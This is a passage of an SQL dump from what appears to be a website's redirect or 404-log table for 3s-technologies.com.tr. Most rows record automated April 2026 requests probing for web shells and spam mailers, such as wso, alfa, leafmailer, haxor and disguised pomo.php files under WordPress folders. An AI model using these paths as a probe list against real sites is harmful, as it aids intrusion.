00:00:00',301),(61000,'http://mail.3s-technologies.com.tr/tr/chosen/chosen.php',NULL,'','',8,0,'2026-04-08 18:16:02','0000-00-00 00:00:00',301),(61001,'http://mail.3s-technologies.com.tr/tr/nice.php?p=',NULL,'','',2,0,'2026-04-08 18:16:04','0000-00-00 00:00:00',301),(61002,'http://mail.3s-technologies.com.tr/tr/uploads/upload_example.php',NULL,'','',2,0,'2026-04-08 18:16:06','0000-00-00 00:00:00',301),(61003,'http://mail.3s-technologies.com.tr/tr/updates.php',NULL,'','',2,0,'2026-04-08 18:16:07','0000-00-00 00:00:00',301),(61004,'http://mail.3s-technologies.com.tr/tr/leafmailer2.8.php',NULL,'','',2,0,'2026-04-08 18:16:08','0000-00-00 00:00:00',301),(61005,'http://mail.3s-technologies.com.tr/tr/wp-ahsera.php',NULL,'','',2,0,'2026-04-08 18:16:10','0000-00-00 00:00:00',301),(61006,'http://mail.3s-technologies.com.tr/tr/wp-easy.php',NULL,'','',2,0,'2026-04-08 18:16:11','0000-00-00 00:00:00',301),(61007,'http://mail.3s-technologies.com.tr/tr/wp-video.php',NULL,'','',2,0,'2026-04-08 18:16:12','0000-00-00 00:00:00',301),(61008,'http://mail.3s-technologies.com.tr/tr/class-wp-http-requests-hooks.php',NULL,'','',2,0,'2026-04-08 18:16:13','0000-00-00 00:00:00',301),(61009,'http://mail.3s-technologies.com.tr/tr/class-envato-market-api.php',NULL,'','',2,0,'2026-04-08 18:16:16','0000-00-00 00:00:00',301),(61010,'http://mail.3s-technologies.com.tr/tr/alfa-ioxi.php',NULL,'','',2,0,'2026-04-08 18:16:16','0000-00-00 00:00:00',301),(61011,'http://mail.3s-technologies.com.tr/tr/wp2.php',NULL,'','',2,0,'2026-04-08 18:16:18','0000-00-00 00:00:00',301),(61012,'http://mail.3s-technologies.com.tr/tr/wp-adminincludesclass-wp-media-list-data.php',NULL,'','',2,0,'2026-04-08 18:16:26','0000-00-00 00:00:00',301),(61013,'http://mail.3s-technologies.com.tr/tr/stindex.php',NULL,'','',2,0,'2026-04-08 18:16:28','0000-00-00 00:00:00',301),(61014,'http://mail.3s-technologies.com.tr/tr/alwso.php',NULL,'','',2,0,'2026-04-08 18:16:29','0000-00-00 00:00:00',301),(61015,'http://mail.3s-technologies.com.tr/tr/media-admin.php',NULL,'','',2,0,'2026-04-08 18:16:31','0000-00-00 00:00:00',301),(61016,'http://mail.3s-technologies.com.tr/tr/symlink.php',NULL,'','',2,0,'2026-04-08 18:16:33','0000-00-00 00:00:00',301),(61017,'http://mail.3s-technologies.com.tr/tr/imagesvuln.php',NULL,'','',2,0,'2026-04-08 18:16:45','0000-00-00 00:00:00',301),(61018,'http://mail.3s-technologies.com.tr/tr/wp-admin/options.php',NULL,'','',2,0,'2026-04-08 18:16:45','0000-00-00 00:00:00',301),(61019,'http://mail.3s-technologies.com.tr/tr/edit-form.php',NULL,'','',2,0,'2026-04-08 18:16:46','0000-00-00 00:00:00',301),(61020,'http://mail.3s-technologies.com.tr/tr/new-index.php',NULL,'','',2,0,'2026-04-08 18:16:50','0000-00-00 00:00:00',301),(61021,'http://mail.3s-technologies.com.tr/tr/qindex.php',NULL,'','',2,0,'2026-04-08 18:16:52','0000-00-00 00:00:00',301),(61022,'http://mail.3s-technologies.com.tr/tr/v5.php',NULL,'','',5,0,'2026-04-08 18:16:56','0000-00-00 00:00:00',301),(61023,'http://mail.3s-technologies.com.tr/tr/www.php',NULL,'','',3,0,'2026-04-08 18:16:58','0000-00-00 00:00:00',301),(61024,'http://mail.3s-technologies.com.tr/tr/defau1t.php',NULL,'','',2,0,'2026-04-08 18:17:00','0000-00-00 00:00:00',301),(61025,'http://mail.3s-technologies.com.tr/tr/sindex.php',NULL,'','',2,0,'2026-04-08 18:17:04','0000-00-00 00:00:00',301),(61026,'http://mail.3s-technologies.com.tr/tr/nee.php',NULL,'','',2,0,'2026-04-08 18:17:07','0000-00-00 00:00:00',301),(61027,'http://mail.3s-technologies.com.tr/tr/haxor.php',NULL,'','',2,0,'2026-04-08 18:17:15','0000-00-00 00:00:00',301),(61028,'http://mail.3s-technologies.com.tr/tr/kindex.php',NULL,'','',2,0,'2026-04-08 18:17:17','0000-00-00 00:00:00',301),(61029,'http://mail.3s-technologies.com.tr/tr/foxwsov1.php',NULL,'','',2,0,'2026-04-08 18:17:18','0000-00-00 00:00:00',301),(61030,'http://www.3s-technologies.com.tr/tr/index/chosen.php',NULL,'','',4,0,'2026-04-08 19:00:07','0000-00-00 00:00:00',301),(61031,'http://www.3s-technologies.com.tr/tr/about/chosen.php',NULL,'','',4,0,'2026-04-08 19:00:08','0000-00-00 00:00:00',301),(61032,'http://www.3s-technologies.com.tr/tr/as/chosen.php',NULL,'','',4,0,'2026-04-08 19:00:09','0000-00-00 00:00:00',301),(61033,'http://www.3s-technologies.com.tr/tr/file/chosen.php',NULL,'','',4,0,'2026-04-08 19:00:09','0000-00-00 00:00:00',301),(61034,'http://www.3s-technologies.com.tr/tr/chosen/chosen.php',NULL,'','',4,0,'2026-04-08 19:00:10','0000-00-00 00:00:00',301),(61035,'http://www.3s-technologies.com.tr/tr/nice.php?p=',NULL,'','',1,0,'2026-04-08 19:00:12','0000-00-00 00:00:00',301),(61036,'http://www.3s-technologies.com.tr/tr/uploads/upload_example.php',NULL,'','',1,0,'2026-04-08 19:00:13','0000-00-00 00:00:00',301),(61037,'http://www.3s-technologies.com.tr/tr/updates.php',NULL,'','',1,0,'2026-04-08 19:00:14','0000-00-00 00:00:00',301),(61038,'http://www.3s-technologies.com.tr/tr/wp-ahsera.php',NULL,'','',1,0,'2026-04-08 19:00:18','0000-00-00 00:00:00',301),(61039,'http://www.3s-technologies.com.tr/tr/wp-easy.php',NULL,'','',1,0,'2026-04-08 19:00:18','0000-00-00 00:00:00',301),(61040,'http://www.3s-technologies.com.tr/tr/wp-video.php',NULL,'','',1,0,'2026-04-08 19:00:19','0000-00-00 00:00:00',301),(61041,'http://www.3s-technologies.com.tr/tr/class-wp-http-requests-hooks.php',NULL,'','',1,0,'2026-04-08 19:00:20','0000-00-00 00:00:00',301),(61042,'http://www.3s-technologies.com.tr/tr/class-envato-market-api.php',NULL,'','',1,0,'2026-04-08 19:00:23','0000-00-00 00:00:00',301),(61043,'http://www.3s-technologies.com.tr/tr/wp2.php',NULL,'','',1,0,'2026-04-08 19:00:25','0000-00-00 00:00:00',301),(61044,'http://www.3s-technologies.com.tr/tr/wp3.php',NULL,'','',1,0,'2026-04-08 19:00:26','0000-00-00 00:00:00',301),(61045,'http://www.3s-technologies.com.tr/tr/wp_wrong_datlib.php',NULL,'','',1,0,'2026-04-08 19:00:31','0000-00-00 00:00:00',301),(61046,'http://www.3s-technologies.com.tr/tr/wp-adminincludesclass-wp-media-list-data.php',NULL,'','',1,0,'2026-04-08 19:00:32','0000-00-00 00:00:00',301),(61047,'http://www.3s-technologies.com.tr/tr/stindex.php',NULL,'','',1,0,'2026-04-08 19:00:34','0000-00-00 00:00:00',301),(61048,'http://www.3s-technologies.com.tr/tr/alwso.php',NULL,'','',1,0,'2026-04-08 19:00:35','0000-00-00 00:00:00',301),(61049,'http://www.3s-technologies.com.tr/tr/media-admin.php',NULL,'','',1,0,'2026-04-08 19:00:36','0000-00-00 00:00:00',301),(61050,'http://www.3s-technologies.com.tr/tr/foxwso.php',NULL,'','',1,0,'2026-04-08 19:00:47','0000-00-00 00:00:00',301),(61051,'http://www.3s-technologies.com.tr/tr/imagesvuln.php',NULL,'','',1,0,'2026-04-08 19:00:49','0000-00-00 00:00:00',301),(61052,'http://www.3s-technologies.com.tr/tr/wp-admin/options.php',NULL,'','',1,0,'2026-04-08 19:00:50','0000-00-00 00:00:00',301),(61053,'http://www.3s-technologies.com.tr/tr/new-index.php',NULL,'','',1,0,'2026-04-08 19:00:54','0000-00-00 00:00:00',301),(61054,'http://www.3s-technologies.com.tr/tr/qindex.php',NULL,'','',1,0,'2026-04-08 19:00:57','0000-00-00 00:00:00',301),(61055,'http://www.3s-technologies.com.tr/tr/sindex.php',NULL,'','',1,0,'2026-04-08 19:01:08','0000-00-00 00:00:00',301),(61056,'http://www.3s-technologies.com.tr/tr/xindex.php',NULL,'','',1,0,'2026-04-08 19:01:20','0000-00-00 00:00:00',301),(61057,'http://www.3s-technologies.com.tr/tr/kindex.php',NULL,'','',1,0,'2026-04-08 19:01:21','0000-00-00 00:00:00',301),(61058,'http://3s-technologies.com.tr/tr/wp-cxx.php',NULL,'','',1,0,'2026-04-08 20:15:53','0000-00-00 00:00:00',301),(61059,'http://3s-technologies.com.tr/tr/water.php',NULL,'','',7,0,'2026-04-08 20:15:54','0000-00-00 00:00:00',301),(61060,'http://3s-technologies.com.tr/tr/ghhjh.php',NULL,'','',1,0,'2026-04-08 20:15:55','0000-00-00 00:00:00',301),(61061,'http://3s-technologies.com.tr/tr/bbny.php',NULL,'','',3,0,'2026-04-08 20:15:58','0000-00-00 00:00:00',301),(61062,'http://3s-technologies.com.tr/tr/wert.php',NULL,'','',11,0,'2026-04-08 20:15:59','0000-00-00 00:00:00',301),(61063,'http://3s-technologies.com.tr/tr/oij98gy.php',NULL,'','',7,0,'2026-04-08 20:16:01','0000-00-00 00:00:00',301),(61064,'http://3s-technologies.com.tr/tr/lela.php',NULL,'','',1,0,'2026-04-08 20:16:02','0000-00-00 00:00:00',301),(61065,'http://3s-technologies.com.tr/tr/tea.php',NULL,'','',15,0,'2026-04-08 20:16:04','0000-00-00 00:00:00',301),(61066,'http://3s-technologies.com.tr/tr/shadow-bot.php',NULL,'','',6,0,'2026-04-08 23:45:13','0000-00-00 00:00:00',301),(61067,'http://3s-technologies.com.tr/tr/zxcs.php',NULL,'','',13,0,'2026-04-08 23:45:14','0000-00-00 00:00:00',301),(61068,'http://3s-technologies.com.tr/tr/ca-022.php',NULL,'','',5,0,'2026-04-08 23:45:15','0000-00-00 00:00:00',301),(61069,'http://3s-technologies.com.tr/tr/rnenu.php',NULL,'','',5,0,'2026-04-08 23:45:16','0000-00-00 00:00:00',301),(61070,'http://3s-technologies.com.tr/tr/fallbackapi.php',NULL,'','',5,0,'2026-04-08 23:45:17','0000-00-00 00:00:00',301),(61071,'http://3s-technologies.com.tr/tr/hhjj1kby8mq.php',NULL,'','',3,0,'2026-04-09 10:37:28','0000-00-00 00:00:00',301),(61072,'http://3s-technologies.com.tr/tr/tjsrzpcpgbk.php',NULL,'','',1,0,'2026-04-09 10:37:29','0000-00-00 00:00:00',301),(61073,'http://3s-technologies.com.tr/tr/aboud.php',NULL,'','',1,0,'2026-04-09 10:37:30','0000-00-00 00:00:00',301),(61074,'http://3s-technologies.com.tr/tr/pcs3rhdujgm.php',NULL,'','',1,0,'2026-04-09 10:37:31','0000-00-00 00:00:00',301),(61075,'http://3s-technologies.com.tr/tr/jmckcndy4s3.php',NULL,'','',1,0,'2026-04-09 10:37:31','0000-00-00 00:00:00',301),(61076,'http://3s-technologies.com.tr/tr/vkyjoi1nkvi.php',NULL,'','',1,0,'2026-04-09 10:37:32','0000-00-00 00:00:00',301),(61077,'http://3s-technologies.com.tr/tr/wxpbahfi2do.php',NULL,'','',1,0,'2026-04-09 10:37:34','0000-00-00 00:00:00',301),(61078,'http://3s-technologies.com.tr/tr/option.php',NULL,'','',6,0,'2026-04-09 10:37:36','0000-00-00 00:00:00',301),(61079,'http://3s-technologies.com.tr/tr/f1jgmosvpbq.php',NULL,'','',1,0,'2026-04-09 10:37:38','0000-00-00 00:00:00',301),(61080,'http://3s-technologies.com.tr/tr/v1cd9rwazmx.php',NULL,'','',1,0,'2026-04-09 10:37:38','0000-00-00 00:00:00',301),(61081,'http://3s-technologies.com.tr/tr/nexusleads.php',NULL,'','',1,0,'2026-04-09 10:37:39','0000-00-00 00:00:00',301),(61082,'http://3s-technologies.com.tr/tr/rfzhh.php',NULL,'','',1,0,'2026-04-09 10:37:40','0000-00-00 00:00:00',301),(61083,'http://3s-technologies.com.tr/tr/plugin-wp.php',NULL,'','',1,0,'2026-04-09 10:37:40','0000-00-00 00:00:00',301),(61084,'http://3s-technologies.com.tr/tr/lpktuneq.php',NULL,'','',1,0,'2026-04-09 10:37:43','0000-00-00 00:00:00',301),(61085,'http://3s-technologies.com.tr/tr/wp-widgets.php',NULL,'','',3,0,'2026-04-09 10:37:45','0000-00-00 00:00:00',301),(61086,'http://3s-technologies.com.tr/tr/tsconfig.php',NULL,'','',1,0,'2026-04-09 10:37:45','0000-00-00 00:00:00',301),(61087,'http://3s-technologies.com.tr/tr/ptfwn5xhub1.php',NULL,'','',1,0,'2026-04-09 10:37:46','0000-00-00 00:00:00',301),(61088,'http://3s-technologies.com.tr/tr/ypwd4kv2spg.php',NULL,'','',1,0,'2026-04-09 10:37:47','0000-00-00 00:00:00',301),(61089,'http://3s-technologies.com.tr/tr/turbo.php',NULL,'','',1,0,'2026-04-09 10:37:47','0000-00-00 00:00:00',301),(61090,'http://3s-technologies.com.tr/tr/se6yfkfkuqa.php',NULL,'','',1,0,'2026-04-09 10:37:48','0000-00-00 00:00:00',301),(61091,'http://3s-technologies.com.tr/tr/class-wp-pagebuilders-1qlzpc.php',NULL,'','',1,0,'2026-04-09 10:37:51','0000-00-00 00:00:00',301),(61092,'http://3s-technologies.com.tr/tr/levyzxsb.php',NULL,'','',1,0,'2026-04-09 10:37:51','0000-00-00 00:00:00',301),(61093,'http://3s-technologies.com.tr/tr/htqmjoari4r.php',NULL,'','',1,0,'2026-04-09 10:37:52','0000-00-00 00:00:00',301),(61094,'http://3s-technologies.com.tr/tr/jtmi25frdcr.php',NULL,'','',1,0,'2026-04-09 10:37:54','0000-00-00 00:00:00',301),(61095,'http://3s-technologies.com.tr/tr/avtptockufv.php',NULL,'','',1,0,'2026-04-09 10:37:54','0000-00-00 00:00:00',301),(61096,'http://3s-technologies.com.tr/tr/fzh64c5enox.php',NULL,'','',1,0,'2026-04-09 10:37:55','0000-00-00 00:00:00',301),(61097,'http://3s-technologies.com.tr/tr/k9s7lshhmvd.php',NULL,'','',1,0,'2026-04-09 10:37:56','0000-00-00 00:00:00',301),(61098,'http://3s-technologies.com.tr/tr/wp-casper.php',NULL,'','',1,0,'2026-04-09 10:37:57','0000-00-00 00:00:00',301),(61099,'http://3s-technologies.com.tr/tr/curve25519-items.php',NULL,'','',1,0,'2026-04-09 10:37:57','0000-00-00 00:00:00',301),(61100,'http://3s-technologies.com.tr/tr/rss-functions-session.php',NULL,'','',1,0,'2026-04-09 10:38:01','0000-00-00 00:00:00',301),(61101,'http://3s-technologies.com.tr/tr/qpgxhzdfios.php',NULL,'','',1,0,'2026-04-09 10:38:01','0000-00-00 00:00:00',301),(61102,'http://3s-technologies.com.tr/tr/kmsoihdgg24.php',NULL,'','',1,0,'2026-04-09 10:38:02','0000-00-00 00:00:00',301),(61103,'http://3s-technologies.com.tr/tr/class-wp-more.php',NULL,'','',1,0,'2026-04-09 10:38:02','0000-00-00 00:00:00',301),(61104,'http://3s-technologies.com.tr/tr/zmjcvbswy.php',NULL,'','',1,0,'2026-04-09 10:38:03','0000-00-00 00:00:00',301),(61105,'http://mail.3s-technologies.com.tr/tr/sites.php',NULL,'','',3,0,'2026-04-09 15:29:19','0000-00-00 00:00:00',301),(61106,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/atomlib.php',NULL,'','',2,0,'2026-04-09 16:44:52','0000-00-00 00:00:00',301),(61107,'http://mail.3s-technologies.com.tr/tr/wp-admin/images/pomo.php',NULL,'','',2,0,'2026-04-09 16:44:53','0000-00-00 00:00:00',301),(61108,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes/pomo.php',NULL,'','',2,0,'2026-04-09 16:44:56','0000-00-00 00:00:00',301),(61109,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/pomo.php',NULL,'','',2,0,'2026-04-09 16:44:56','0000-00-00 00:00:00',301),(61110,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/widgets/pomo.php',NULL,'','',2,0,'2026-04-09 16:44:57','0000-00-00 00:00:00',301),(61111,'http://mail.3s-technologies.com.tr/tr/wp-admin/network/pomo.php',NULL,'','',2,0,'2026-04-09 16:44:58','0000-00-00 00:00:00',301),(61112,'http://mail.3s-technologies.com.tr/tr/wp-admin/user/pomo.php',NULL,'','',2,0,'2026-04-09 16:44:58','0000-00-00 00:00:00',301),(61113,'http://mail.3s-technologies.com.tr/tr/mailer.php',NULL,'','',5,0,'2026-04-09 16:44:59','0000-00-00 00:00:00',301),(61114,'http://mail.3s-technologies.com.tr/tr/sendmail.php',NULL,'','',6,0,'2026-04-09 16:45:00','0000-00-00 00:00:00',301),(61115,'http://mail.3s-technologies.com.tr/tr/send.php',NULL,'','',5,0,'2026-04-09 16:45:01','0000-00-00 00:00:00',301),(61116,'http://mail.3s-technologies.com.tr/tr/sendemail.php',NULL,'','',5,0,'2026-04-09 16:45:02','0000-00-00 00:00:00',301),(61117,'http://mail.3s-technologies.com.tr/tr/it.php',NULL,'','',5,0,'2026-04-09 16:45:04','0000-00-00 00:00:00',301),(61118,'http://mail.3s-technologies.com.tr/tr/wso1.php',NULL,'','',5,0,'2026-04-09 16:45:05','0000-00-00 00:00:00',301),(61119,'http://mail.3s-technologies.com.tr/tr/alfa123.php',NULL,'','',5,0,'2026-04-09 16:45:10','0000-00-00 00:00:00',301),(61120,'http://mail.3s-technologies.com.tr/tr/alex.php',NULL,'','',5,0,'2026-04-09 16:45:13','0000-00-00 00:00:00',301),(61121,'http://mail.3s-technologies.com.tr/tr/alexuse.php',NULL,'','',4,0,'2026-04-09 16:45:14','0000-00-00 00:00:00',301),(61122,'http://mail.3s-technologies.com.tr/tr/alexusmailer 2.0.php',NULL,'','',5,0,'2026-04-09 16:45:15','0000-00-00 00:00:00',301),(61123,'http://mail.3s-technologies.com.tr/tr/leaf.php',NULL,'','',8,0,'2026-04-09 16:45:16','0000-00-00 00:00:00',301),(61124,'http://mail.3s-technologies.com.tr/tr/leafmailer.php',NULL,'','',5,0,'2026-04-09 16:45:17','0000-00-00 00:00:00',301),(61125,'http://mail.3s-technologies.com.tr/tr/kiss.php',NULL,'','',5,0,'2026-04-09 16:45:17','0000-00-00 00:00:00',301),(61126,'http://mail.3s-technologies.com.tr/tr/file-manager.php',NULL,'','',5,0,'2026-04-09 16:45:24','0000-00-00 00:00:00',301),(61127,'http://mail.3s-technologies.com.tr/tr/gel.php',NULL,'','',6,0,'2026-04-09 16:45:25','0000-00-00 00:00:00',301),(61128,'http://mail.3s-technologies.com.tr/tr/olux.php',NULL,'','',5,0,'2026-04-09 16:45:27','0000-00-00 00:00:00',301),(61129,'http://mail.3s-technologies.com.tr/tr/olu.php',NULL,'','',5,0,'2026-04-09 16:45:28','0000-00-00 00:00:00',301),(61130,'http://mail.3s-technologies.com.tr/tr/nasgor.php',NULL,'','',5,0,'2026-04-09 16:45:30','0000-00-00 00:00:00',301),(61131,'http://mail.3s-technologies.com.tr/tr/rahma.php',NULL,'','',5,0,'2026-04-09 16:45:30','0000-00-00 00:00:00',301),(61132,'http://mail.3s-technologies.com.tr/tr/mrjn.php',NULL,'','',5,0,'2026-04-09 16:45:31','0000-00-00 00:00:00',301),(61133,'http://mail.3s-technologies.com.tr/tr/wp-configer.php',NULL,'','',5,0,'2026-04-09 16:45:32','0000-00-00 00:00:00',301),(61134,'http://mail.3s-technologies.com.tr/tr/wp-conffg.php',NULL,'','',5,0,'2026-04-09 16:45:33','0000-00-00 00:00:00',301),(61135,'http://mail.3s-technologies.com.tr/tr/wp-confiig.php',NULL,'','',5,0,'2026-04-09 16:45:34','0000-00-00 00:00:00',301),(61136,'http://mail.3s-technologies.com.tr/tr/wp-settings.php',NULL,'','',6,0,'2026-04-09 16:45:35','0000-00-00 00:00:00',301),(61137,'http://mail.3s-technologies.com.tr/tr/wp-confirm.php',NULL,'','',5,0,'2026-04-09 16:45:36','0000-00-00 00:00:00',301),(61138,'http://mail.3s-technologies.com.tr/tr/wp-one.php',NULL,'','',5,0,'2026-04-09 16:45:37','0000-00-00 00:00:00',301),(61139,'http://mail.3s-technologies.com.tr/tr/wp-uploads.php',NULL,'','',5,0,'2026-04-09 16:45:40','0000-00-00 00:00:00',301),(61140,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/pomo.php',NULL,'','',2,0,'2026-04-09 16:45:43','0000-00-00 00:00:00',301),(61141,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/pomo.php',NULL,'','',2,0,'2026-04-09 16:45:44','0000-00-00 00:00:00',301),(61142,'http://mail.3s-technologies.com.tr/tr/wp-content/languages/pomo.php',NULL,'','',2,0,'2026-04-09 16:45:46','0000-00-00 00:00:00',301),(61143,'http://mail.3s-technologies.com.tr/tr/wp-content/languages/themes/pomo.php',NULL,'','',2,0,'2026-04-09 16:45:47','0000-00-00 00:00:00',301),(61144,'http://mail.3s-technologies.com.tr/tr/wp-includes/simplepie/pomo.php',NULL,'','',2,0,'2026-04-09 16:45:47','0000-00-00 00:00:00',301),(61145,'http://mail.3s-technologies.com.tr/tr/wp-includes/css/dist/niil.php',NULL,'','',2,0,'2026-04-09 16:45:48','0000-00-00 00:00:00',301),(61146,'http://mail.3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/core/curve25519-items.php',NULL,'','',2,0,'2026-04-09 16:45:49','0000-00-00 00:00:00',301),(61147,'http://mail.3s-technologies.com.tr/tr/ohayo.php',NULL,'','',4,0,'2026-04-09 16:46:02','0000-00-00 00:00:00',301),(61148,'http://mail.3s-technologies.com.tr/tr/cms.php',NULL,'','',5,0,'2026-04-09 16:46:03','0000-00-00 00:00:00',301),(61149,'http://mail.3s-technologies.com.tr/tr/alfa_data/alfacgiapi/perl.alfa',NULL,'','',6,0,'2026-04-09 16:46:13','0000-00-00 00:00:00',301),(61150,'http://mail.3s-technologies.com.tr/tr/.well-known/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2026-04-09 16:46:14','0000-00-00 00:00:00',301),(61151,'http://mail.3s-technologies.com.tr/tr/tmp_images/alfacgiapi/perl.alfa',NULL,'','',2,0,'2026-04-09 16:46:15','0000-00-00 00:00:00',301),(61152,'http://mail.3s-technologies.com.tr/tr/wp-includes/alfacgiapi/perl.alfa',NULL,'','',2,0,'2026-04-09 16:47:31','0000-00-00 00:00:00',301),(61153,'http://mail.3s-technologies.com.tr/tr/alfacgiapi/perl.alfa',NULL,'','',2,0,'2026-04-09 16:47:31','0000-00-00 00:00:00',301),(61154,'http://mail.3s-technologies.com.tr/tr/css/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2026-04-09 16:47:32','0000-00-00 00:00:00',301),(61155,'http://mail.3s-technologies.com.tr/tr/files/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2026-04-09 16:47:33','0000-00-00 00:00:00',301),(61156,'http://mail.3s-technologies.com.tr/tr/images/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2026-04-09 16:47:33','0000-00-00 00:00:00',301),(61157,'http://mail.3s-technologies.com.tr/tr/alfa_data/alfacgiapi/perl.alfa\"',NULL,'','',2,0,'2026-04-09 16:47:34','0000-00-00 00:00:00',301),(61158,'http://mail.3s-technologies.com.tr/tr/wp-admin/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2026-04-09 16:47:35','0000-00-00 00:00:00',301),(61159,'http://mail.3s-technologies.com.tr/tr/wp-content/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2026-04-09 16:47:36','0000-00-00 00:00:00',301),(61160,'http://mail.3s-technologies.com.tr/tr/date.php',NULL,'','',8,0,'2026-04-09 16:47:36','0000-00-00 00:00:00',301),(61161,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/pomo.php',NULL,'','',2,0,'2026-04-09 16:47:38','0000-00-00 00:00:00',301),(61162,'http://mail.3s-technologies.com.tr/tr/wp-content/pomo.php',NULL,'','',2,0,'2026-04-09 16:47:39','0000-00-00 00:00:00',301),(61163,'https://3s-technologies.com.tr/tr/public/plugins/ckeditor/images/spacer.gif',NULL,'https://3s-technologies.com.tr/public/plugins/ckeditor/images/spacer.gif','',1,0,'2026-04-09 17:47:21','0000-00-00 00:00:00',301),(61164,'https://3s-technologies.com.tr/tr/public/plugins/ueditor/dialogs/attachment/filetypeimages/icon_psd.gif',NULL,'https://3s-technologies.com.tr/public/plugins/Ueditor/dialogs/attachment/fileTypeImages/icon_psd.gif','',1,0,'2026-04-09 17:47:22','0000-00-00 00:00:00',301),(61165,'https://3s-technologies.com.tr/tr/public/plugins/ueditor/dialogs/attachment/images/alignicon.gif',NULL,'https://3s-technologies.com.tr/public/plugins/Ueditor/dialogs/attachment/images/alignicon.gif','',1,0,'2026-04-09 17:47:24','0000-00-00 00:00:00',301),(61166,'http://mail.3s-technologies.com.tr/tr/xwzs.php',NULL,'','',1,0,'2026-04-09 18:35:22','0000-00-00 00:00:00',301),(61167,'http://mail.3s-technologies.com.tr/tr/wp-admin/network/users.php',NULL,'','',4,0,'2026-04-09 18:35:23','0000-00-00 00:00:00',301),(61168,'http://mail.3s-technologies.com.tr/tr/ewe.php',NULL,'','',1,0,'2026-04-09 18:35:24','0000-00-00 00:00:00',301),(61169,'http://mail.3s-technologies.com.tr/tr/aboute.php',NULL,'','',14,0,'2026-04-09 18:35:25','0000-00-00 00:00:00',301),(61170,'http://mail.3s-technologies.com.tr/tr/x9.php',NULL,'','',1,0,'2026-04-09 18:35:25','0000-00-00 00:00:00',301),(61171,'http://mail.3s-technologies.com.tr/tr/redixsx.php',NULL,'','',2,0,'2026-04-09 18:35:29','0000-00-00 00:00:00',301),(61172,'http://mail.3s-technologies.com.tr/tr/cpp2.php',NULL,'','',1,0,'2026-04-09 18:35:29','0000-00-00 00:00:00',301),(61173,'http://mail.3s-technologies.com.tr/tr/admlo.php',NULL,'','',7,0,'2026-04-09 18:35:30','0000-00-00 00:00:00',301),(61174,'http://mail.3s-technologies.com.tr/tr/amthd.php',NULL,'','',1,0,'2026-04-09 18:35:33','0000-00-00 00:00:00',301),(61175,'http://mail.3s-technologies.com.tr/tr/njxjtooj.php',NULL,'','',1,0,'2026-04-09 18:35:40','0000-00-00 00:00:00',301),(61176,'http://mail.3s-technologies.com.tr/tr/iyy.php',NULL,'','',1,0,'2026-04-09 18:35:42','0000-00-00 00:00:00',301),(61177,'http://mail.3s-technologies.com.tr/tr/900.php',NULL,'','',4,0,'2026-04-09 18:35:42','0000-00-00 00:00:00',301),(61178,'http://mail.3s-technologies.com.tr/tr/blsvgeyaza.php',NULL,'','',1,0,'2026-04-09 18:35:43','0000-00-00 00:00:00',301),(61179,'http://mail.3s-technologies.com.tr/tr/gqhyti.php',NULL,'','',1,0,'2026-04-09 18:35:44','0000-00-00 00:00:00',301),(61180,'http://mail.3s-technologies.com.tr/tr/autoxxi.php',NULL,'','',1,0,'2026-04-09 18:35:45','0000-00-00 00:00:00',301),(61181,'http://mail.3s-technologies.com.tr/tr/1144452145_error_log.php',NULL,'','',1,0,'2026-04-09 18:35:45','0000-00-00 00:00:00',301),(61182,'http://mail.3s-technologies.com.tr/tr/ws48.php',NULL,'','',4,0,'2026-04-09 18:35:46','0000-00-00 00:00:00',301),(61183,'http://mail.3s-technologies.com.tr/tr/wp-asyn-upload.php',NULL,'','',2,0,'2026-04-09 18:35:47','0000-00-00 00:00:00',301),(61184,'http://mail.3s-technologies.com.tr/tr/schallfuns.php',NULL,'','',1,0,'2026-04-09 18:35:48','0000-00-00 00:00:00',301),(61185,'http://mail.3s-technologies.com.tr/tr/myfilexxx.php',NULL,'','',1,0,'2026-04-09 18:35:52','0000-00-00 00:00:00',301),(61186,'http://mail.3s-technologies.com.tr/tr/karma_144a.php',NULL,'','',1,0,'2026-04-09 18:35:54','0000-00-00 00:00:00',301),(61187,'http://mail.3s-technologies.com.tr/tr/3586 b64.php',NULL,'','',1,0,'2026-04-09 18:35:55','0000-00-00 00:00:00',301),(61188,'http://mail.3s-technologies.com.tr/tr/bmi.php',NULL,'','',4,0,'2026-04-09 18:35:57','0000-00-00 00:00:00',301),(61189,'http://mail.3s-technologies.com.tr/tr/wp-admin/network/edit.php',NULL,'','',4,0,'2026-04-09 18:36:00','0000-00-00 00:00:00',301),(61190,'http://mail.3s-technologies.com.tr/tr/file-mancvgertdxz.php',NULL,'','',1,0,'2026-04-09 18:36:03','0000-00-00 00:00:00',301),(61191,'http://mail.3s-technologies.com.tr/tr/ws57.php',NULL,'','',10,0,'2026-04-09 18:36:04','0000-00-00 00:00:00',301),(61192,'http://mail.3s-technologies.com.tr/tr/.qiodetme.php',NULL,'','',1,0,'2026-04-09 18:36:05','0000-00-00 00:00:00',301),(61193,'http://mail.3s-technologies.com.tr/tr/yw5bi63u.php',NULL,'','',4,0,'2026-04-09 18:36:06','0000-00-00 00:00:00',301),(61194,'http://3s-technologies.com.tr/tr/index/chosen.php',NULL,'','',13,0,'2026-04-09 18:51:33','0000-00-00 00:00:00',301),(61195,'http://3s-technologies.com.tr/tr/about/chosen.php',NULL,'','',13,0,'2026-04-09 18:51:34','0000-00-00 00:00:00',301),(61196,'http://3s-technologies.com.tr/tr/as/chosen.php',NULL,'','',13,0,'2026-04-09 18:51:35','0000-00-00 00:00:00',301),(61197,'http://3s-technologies.com.tr/tr/file/chosen.php',NULL,'','',13,0,'2026-04-09 18:51:36','0000-00-00 00:00:00',301),(61198,'http://3s-technologies.com.tr/tr/chosen/chosen.php',NULL,'','',13,0,'2026-04-09 18:51:38','0000-00-00 00:00:00',301),(61199,'http://3s-technologies.com.tr/tr/wp-admin/images/pomo.php',NULL,'','',2,0,'2026-04-09 18:51:44','0000-00-00 